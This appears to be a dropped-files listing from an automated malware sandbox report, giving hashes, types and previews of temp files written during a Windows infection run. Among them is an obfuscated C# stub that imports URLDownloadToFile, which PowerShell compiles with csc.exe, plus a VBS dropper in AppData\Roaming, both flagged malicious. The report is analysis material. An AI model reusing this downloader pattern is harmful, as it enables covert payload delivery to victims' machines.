                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuketgcs.y2w.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfikurr3.a2e.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltrjovxr.erk.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuub4yn3.fce.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1tij1k1.z02.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwcn4zdm.40l.ps1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y13swgng.3ii.psm1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\a9be58b8-9a3f-4072-9fda-c8ac783745eb.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bhvA98D.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9cdd386c, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15728640
                                                                                                                                                                                                                              Entropy (8bit):0.1010164436272026
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:uSB2jpSB2jFSjlK/Qw/ZweshzbOlqVqdesWzbYFIeszO/Z5eHW5d:ua6a2UueqkzYRzOW
                                                                                                                                                                                                                              MD5:249FEB833BF1C58EFC76A82D24633D3B
                                                                                                                                                                                                                              SHA1:B4AA9A3B2DDC9A6EF5475A8FAACDE445423CECDD
                                                                                                                                                                                                                              SHA-256:8E7F0BEC4C74B7BE40E4D00DDFBD99FE7FE7D20968BA56F829DEA9444B29B632
                                                                                                                                                                                                                              SHA-512:84206F5C7EDF45E822A8D269371D54508F33C21000E006084EA38686688EF47F8D5B2A6E018D8D3C9A01BAD2B850161B521CA2E90D83A342F7A09FC65A291F26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..8l... ...................':...{........................P......"...{#.'"...{..h.R.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................xX.t'"...{...................G1.'"...{...........................#......h.R.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cakcgbw

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                              Entropy (8bit):5.378575820685335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa07a1Dx54LC07Y5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa071
                                                                                                                                                                                                                              MD5:4F31CCCA37A07864D8EAEC8FED89BB61
                                                                                                                                                                                                                              SHA1:21C4009E29A1D16A50A505480FAE7229931E2C22
                                                                                                                                                                                                                              SHA-256:0C2AC30C333061C65834061E104227853D453BE5C44A4BAE5B6860A6A1A4A80E
                                                                                                                                                                                                                              SHA-512:93A38285D07835324CB8CCAA98F3C79C7508B34BEA76FED91CB0ED1395D98A72A074A67C2720CE2044C43FC14DF22076FE903995CF009F844718037984D4EF52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                              Entropy (8bit):3.120177967590278
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry41ak7YnqqD6PN5Dlq5J:+RI+ycuZhNS1akSD6PNnqX
                                                                                                                                                                                                                              MD5:5C30B5E4EF6E345F9B5501A0FB7F5BEF
                                                                                                                                                                                                                              SHA1:CFC02C69C67CAF0FBB56AF29325DD22854E52A2B
                                                                                                                                                                                                                              SHA-256:A3BE696E1EB166E37A0F917503DF81EA7D8048BA9082F0700C7259B368F4D36B
                                                                                                                                                                                                                              SHA-512:A458E6B7E7247AF844CD61340014FE29960F6E5AB9745D89BEA5D0A783B7C1CD1534B8A8F092023602CED00976B07E3B37DA3174B960461175150F79E0834D1D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.z.f.3.q.r.f.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.z.f.3.q.r.f.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.0.cs

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (363)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):480
                                                                                                                                                                                                                              Entropy (8bit):3.83065676495063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zu2Wdy8jMOHQXReKJ8SRHy4HwwuZCl/QAgy:V/DTLDfu2YTwXfHPuHy
                                                                                                                                                                                                                              MD5:C66E77D41AF1843E35B6467CC2482922
                                                                                                                                                                                                                              SHA1:F224CAC3DD486AC45F0DEBD3EC7343BB3150D1D3
                                                                                                                                                                                                                              SHA-256:C9D35DF0658D18E1F5A467FE8AACC3DA8BAFF1681FC5B95EFBC7B4325DF1595D
                                                                                                                                                                                                                              SHA-512:7C3BC95EB54636A65790070923B7FCB41CAC1CB38570D2803448C36CE7048CB920F03A6C33DB48237B4A317795D4C4895B97091FEE12E947EFB1D7547C4A1C4B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace Mwur.{. public class wjkOOxElX. {. [DllImport("URLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr SkysDz,string fyAyba,string FfHhH,uint tjc,IntPtr OmquhlvmBI);.. }..}.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):371
                                                                                                                                                                                                                              Entropy (8bit):5.300871831062841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23ftMdzxs7+AEszICHhJ23ftM4:p37Lvkmb6KiIWZEvF
                                                                                                                                                                                                                              MD5:140800A383E844DC555FCD70DF5F0E9C
                                                                                                                                                                                                                              SHA1:3573C2892B3AE6C93250DB7437E2329C678F5B1A
                                                                                                                                                                                                                              SHA-256:2D8F2F114F315C690F3B9126510E1BA4B88D0B0E55BDAF8E156D31A96AF418AB
                                                                                                                                                                                                                              SHA-512:979CC543E010CF745D27E11A45BD2B54E7807D0D7A3A43BDDE6B89C76EF8B85C5C225242793ADF95CD18B15A9F4668E02ABBC0367B104462360AB11FC45D63B5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.0.cs"

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                                                                              Entropy (8bit):2.843781772819573
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:etGSMePBe5ekrl8sN8gkQtlqBdO7nytkZfyGObCZ0WI+ycuZhNS1akSD6PNnq:68skr+kwO7n1JyLbCZX1ulGa3iq
                                                                                                                                                                                                                              MD5:273D350A196B6E00B7D9840E77E6B17F
                                                                                                                                                                                                                              SHA1:395A5D3722386DD660F5D58A762D843D07AAB4F1
                                                                                                                                                                                                                              SHA-256:21A2A451A1D57673B51F4C2E205584F2A837D7A3D61D2D1804B94AAC3A26742A
                                                                                                                                                                                                                              SHA-512:8D28635AD3CAD05EBA4932E2A008F2B62435E1780CA039FB9D76AF236E06040637426B1F7D264A97F86ECC5BD9E2A42FFFB612978CB400B7FA4F68B2CCCE9EAB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~;g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....x.....x...........................!.............. =.....P ......O.........U.....\.....c.....i.....m...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.hz

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.out

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):870
                                                                                                                                                                                                                              Entropy (8bit):5.337134512608774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KOqd3ka6KiZEvgKax5DqBVKVrdFAMBJTH:xika6LZEvgK2DcVKdBJj
                                                                                                                                                                                                                              MD5:70967DB669C90F6B18C63527736FA373
                                                                                                                                                                                                                              SHA1:1E8E507970C579B8FE0240F116DE81DB29EA4931
                                                                                                                                                                                                                              SHA-256:C0BC88EA103FA66F708C9BCA6927A75CE0EFDCF9ADA16C1F2F986F652A3AA1A9
                                                                                                                                                                                                                              SHA-512:8061BE6DF3C3C03695BB6A017F4AF7C9FB548579DB05B8229B4153A171CB09919A524C0C854BE5FC6382154881F12D0E167D9BD1C36A3A249339B933845579C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7696_239351817\27ab2aae-606e-43d2-b972-e56a92e1a1b6.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):135771
                                                                                                                                                                                                                              Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                              MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                              SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                              SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                              SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (372), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):140880
                                                                                                                                                                                                                              Entropy (8bit):3.673474644726778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:sK4Og9oq843Inb8CU3OuunFFKCLAgt5pKQGwm:sOaGb8CUxuFs
                                                                                                                                                                                                                              MD5:C9B675B1514C024221535D4BDE6F6C69
                                                                                                                                                                                                                              SHA1:24594969BC105AEC0E15F109872193C030C0C102
                                                                                                                                                                                                                              SHA-256:E58BA960C159E99A12D4C50D3FFFE4A9EE2B50F08E702BC90D4E18B7AA9421FB
                                                                                                                                                                                                                              SHA-512:328E530EB7ABB045624D793FAF89CCC1A16E0C1A1C58E3A33D2CB4BD955742D511F3B07D183423A7643A57579CDD0591D968640D106FAD5D1C6A4B1AD4C494D8
                                                                                                                                                                                                                              Malicious:true
